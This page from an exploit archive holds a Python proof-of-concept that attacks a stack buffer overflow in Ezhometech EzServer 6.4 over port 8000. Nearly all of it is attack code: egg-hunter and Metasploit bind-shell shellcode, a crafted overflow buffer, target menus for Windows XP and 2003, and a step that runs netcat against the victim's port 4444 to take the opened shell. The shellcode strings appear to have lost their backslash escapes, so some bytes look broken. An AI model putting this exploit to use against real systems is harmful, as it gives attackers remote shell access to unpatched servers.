[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Ezhometech Ezserver 6.4 Stack Overflow Exploit
# Published : 2012-06-18
# Author :
# Previous Title : XM Easy Personal FTP Server <= v5.30 Remote Format String Write4 Exploit
# Next Title : ALLMediaServer 0.8 SEH Overflow Exploit


# Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability
# Author: modpr0be
# Contact: research[at]Spentera[dot]com
# Platform: Windows
# Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn)
# Software Link: http://www.ezhometech.com/buy_ezserver.htm
# References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/
 
### Software Description
# EZserver is a Video Server that stream Full HD to various devices.

### Vulnerability Details
# Buffer overflow condition exist in URL handling, sending long GET request 
# will cause server process to exit and may allow malicious code injection. 
# Further research found that the application does not care about the HTTP method, 
# so that by sending long characters will make the program crash.
 
### Vendor logs:
# 06/11/2012 - Bug found
# 06/12/2012 - Vendor contacted
# 06/16/2012 - No response from vendor, POC release.

#!/usr/bin/python

import sys
import struct
from socket import *
from os import system
from time import sleep

hunt = (
"x66x81xCAxFFx0Fx42x52x6A"
"x02x58xCDx2Ex3Cx05x5Ax74"
"xEFxB8x77x30x30x74x8BxFA"
"xAFx75xEAxAFx75xE7xFFxE7")

#windows/shell_bind_tcp - 751 bytes
#http://www.metasploit.com
#Encoder: x86/alpha_upper
#AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444, 

shellcode = ("x89xe5xdaxcfxd9x75xf4x5dx55x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4dx38x4cx49x45x50"
"x35x50x53x30x35x30x4bx39x4ax45x36x51x38x52x33"
"x54x4cx4bx50x52x56x50x4cx4bx46x32x44x4cx4cx4b"
"x30x52x45x44x4cx4bx33x42x37x58x44x4fx38x37x51"
"x5ax57x56x50x31x4bx4fx36x51x4fx30x4ex4cx47x4c"
"x53x51x43x4cx34x42x46x4cx37x50x49x51x38x4fx54"
"x4dx53x31x38x47x4ax42x4ax50x36x32x56x37x4cx4b"
"x56x32x44x50x4cx4bx37x32x37x4cx43x31x38x50x4c"
"x4bx37x30x33x48x4bx35x59x50x54x34x31x5ax33x31"
"x4ex30x36x30x4cx4bx30x48x52x38x4cx4bx56x38x57"
"x50x53x31x4ex33x4ax43x57x4cx30x49x4cx4bx50x34"
"x4cx4bx53x31x39x46x50x31x4bx4fx36x51x59x50x4e"
"x4cx59x51x48x4fx34x4dx45x51x59x57x50x38x4bx50"
"x53x45x5ax54x33x33x53x4dx4bx48x47x4bx33x4dx31"
"x34x42x55x4ax42x46x38x4cx4bx36x38x31x34x45x51"
"x38x53x55x36x4cx4bx54x4cx50x4bx4cx4bx50x58x35"
"x4cx43x31x59x43x4cx4bx34x44x4cx4bx35x51x48x50"
"x4cx49x31x54x31x34x57x54x51x4bx31x4bx55x31x56"
"x39x30x5ax50x51x4bx4fx4dx30x31x48x31x4fx30x5a"
"x4cx4bx54x52x5ax4bx4dx56x51x4dx33x58x37x43x47"
"x42x45x50x53x30x43x58x34x37x53x43x46x52x31x4f"
"x50x54x52x48x30x4cx54x37x46x46x53x37x4bx4fx39"
"x45x58x38x4cx50x55x51x43x30x45x50x37x59x58x44"
"x46x34x56x30x53x58x31x39x4dx50x32x4bx45x50x4b"
"x4fx58x55x36x30x56x30x56x30x46x30x47x30x46x30"
"x31x50x46x30x55x38x4ax4ax44x4fx39x4fx4bx50x4b"
"x4fx48x55x4dx59x59x57x50x31x59x4bx30x53x55x38"
"x55x52x35x50x52x31x51x4cx4bx39x4ax46x32x4ax32"
"x30x31x46x50x57x35x38x49x52x59x4bx56x57x53x57"
"x4bx4fx39x45x30x53x51x47x52x48x4ex57x4dx39x37"
"x48x4bx4fx4bx4fx49x45x51x43x50x53x30x57x35x38"
"x44x34x5ax4cx47x4bx4bx51x4bx4fx49x45x56x37x4c"
"x49x58x47x43x58x34x35x42x4ex50x4dx53x51x4bx4f"
"x58x55x55x38x43x53x52x4dx33x54x55x50x4cx49x4b"
"x53x51x47x46x37x31x47x36x51x4cx36x33x5ax42x32"
"x31x49x46x36x5ax42x4bx4dx45x36x48x47x47x34x31"
"x34x37x4cx55x51x33x31x4cx4dx30x44x47x54x44x50"
"x48x46x35x50x30x44x30x54x30x50x46x36x51x46x56"
"x36x37x36x46x36x30x4ex31x46x51x46x51x43x31x46"
"x32x48x52x59x48x4cx57x4fx4bx36x4bx4fx38x55x4d"
"x59x4dx30x50x4ex56x36x51x56x4bx4fx36x50x43x58"
"x54x48x4cx47x55x4dx33x50x4bx4fx4ex35x4fx4bx4a"
"x50x58x35x4fx52x36x36x53x58x49x36x4dx45x4fx4d"
"x4dx4dx4bx4fx58x55x47x4cx43x36x53x4cx35x5ax4d"
"x50x4bx4bx4dx30x54x35x55x55x4fx4bx57x37x35x43"
"x32x52x52x4fx43x5ax45x50x51x43x4bx4fx4ex35x41"
"x41")

junk1 = "x41" * 5025
junk2 = "x42" * 5029
junk3 = "x43" * 10000
buff = "w00tw00t"
buff+= shellcode
buff+= "x90" * 100
buff+= "xebx08x90x90"
buff+= struct.pack('<L', 0x10212779)
buff+= "x90" * 16
buff+= hunt
buff+= "x44" * 5000

def winxp():
	try:
		host = raw_input("[!] Target IP: ")
		print "[!] Connecting to %s on port 8000" %host
		s = socket(AF_INET, SOCK_STREAM)
		s.connect((host,8000))
		print "[+] Launching attack.."
		print "[+] Sending payload.."
		payload = junk1+buff
		s.send (payload)
		s.close()
		print "[+] Wait for hunter.."
		sleep(5)
		print "[+] Connecting to target shell!"
		sleep(2)
		system("nc -v %s 4444" %host)
	except:
		print "[x] Could not connect to the server x_x"
		sys.exit()
		
def win2k3():
	try:
		host = raw_input("[!] Target IP: ")
		print "[!] Connecting to %s on port 8000" %host
		s = socket(AF_INET, SOCK_STREAM)
		s.connect((host,8000))
		print "[+] Launching attack.."
		print "[+] Sending payload.."
		payload = junk2+buff
		s.send(payload)
		s.close()
		print "[+] Wait for hunter.."
		sleep(5)
		print "[+] Connecting to target shell!"
		sleep(1)
		system("nc -v %s 4444" %host)
	except:
		print "[x] Could not connect to the server x_x"
		sys.exit()
		
def crash():
	try:
		host = raw_input("[!] Target IP: ")
		print "[!] Connecting to %s on port 8000" %host
		s = socket(AF_INET, SOCK_STREAM)
		s.connect((host,8000))
		print "[+] Launching attack.."
		print "[+] Sending payload.."
		payload = junk3
		s.send (payload)
		s.close()
		print "[+] Server should be crashed! Check your debugger"
	except:
		print "[x] Could not connect to the server x_x"
		sys.exit()

print "#################################################################"
print "#     EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit	#"
print "#              by modpr0be[at]spentera | @modpr0be		#"
print "#           thanks to: otoy, cikumel, y0k | @spentera		#"
print "================================================================="
print "t1.Windows XP SP3 (DEP OptIn) bindshell on port 4444"
print "t2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444"
print "t3.Crash only (debug)n"

a = 0
while a < 3:
	a = a + 1
	op = input ("[!] Choose your target OS: ")
	if op == 1:
		winxp()
		sys.exit()
	elif op == 2:
		win2k3()
		sys.exit()
	elif op == 3:
		crash()
		sys.exit()
	else:
		print "[-] Oh plz.. pick the right one :)rn"